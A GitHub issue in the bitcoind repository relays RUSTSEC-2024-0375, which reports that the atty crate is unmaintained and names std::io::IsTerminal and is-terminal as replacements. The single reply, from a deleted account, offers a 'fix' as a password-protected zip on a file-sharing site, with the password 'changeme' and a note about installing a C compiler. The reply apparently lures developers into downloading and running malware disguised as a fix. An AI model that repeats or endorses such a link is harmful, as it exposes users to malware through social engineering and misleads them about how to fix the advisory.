bitcoind icon indicating copy to clipboard operation
bitcoind copied to clipboard

RUSTSEC-2024-0375: `atty` is unmaintained

Open github-actions[bot] opened this issue 1 year ago • 1 comments

atty is unmaintained

Details
Status unmaintained
Package atty
Version 0.2.14
URL https://github.com/softprops/atty/issues/57
Date 2024-09-25

The maintainer of atty has published an official notice that the crate is no longer under development, and that users should instead rely on the functionality in the standard library's IsTerminal trait.

Alternative(s)

  • std::io::IsTerminal - Stable since Rust 1.70.0 and the recommended replacement per the atty maintainer.
  • is-terminal - Standalone crate supporting Rust older than 1.70.0

See advisory page for additional details.

github-actions[bot] avatar Sep 29 '24 01:09 github-actions[bot]

I think this will help you. https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme

you may need to install the c compiler

ghost avatar Sep 29 '24 01:09 ghost